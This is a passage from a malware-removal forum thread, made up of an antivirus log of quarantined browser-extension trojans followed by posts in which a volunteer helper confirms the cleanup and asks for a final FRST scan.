sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Administrator\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=17163F51304FE6F67830F6E86D8CBF55ADFC24CF ft=1 fh=6d4bb48ee88ff6fa vn="a variant of Win32/AdkDLLWrapper.A potentially unwanted application" ac=I fn="C:\Users\Rainsford\AppData\Roaming\BitTorrent\updates\7.9.0_30659.exe"
 



#12 deeprybka


Posted 12 October 2015 - 09:40 AM

This is looking very good. No more active malware or adware has been found. :)

How is the computer running now?
regards,
deeprybka

#13 Rainsford


Posted 12 October 2015 - 05:52 PM

Seems to be working fine now. Thank you so much for your help. You are a wonderful person for taking time out of your life to help people. Thank you for everything =)



#14 deeprybka


Posted 13 October 2015 - 02:37 AM

You are welcome.

Step 1

[image: frst.png] [image: frstscan.png]

Start FRST with administrator privileges.
  • Make sure the following option is checked: [image: addition.png]
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

regards,
deeprybka

#15 deeprybka


Posted 16 October 2015 - 05:39 AM

Hi,

3 Day Inactivity

This is the third day since my last post. Are you still there?

If you need more time, just let me know.

If you do not post within 48 hours, this thread will be closed due to inactivity.
regards,
deeprybka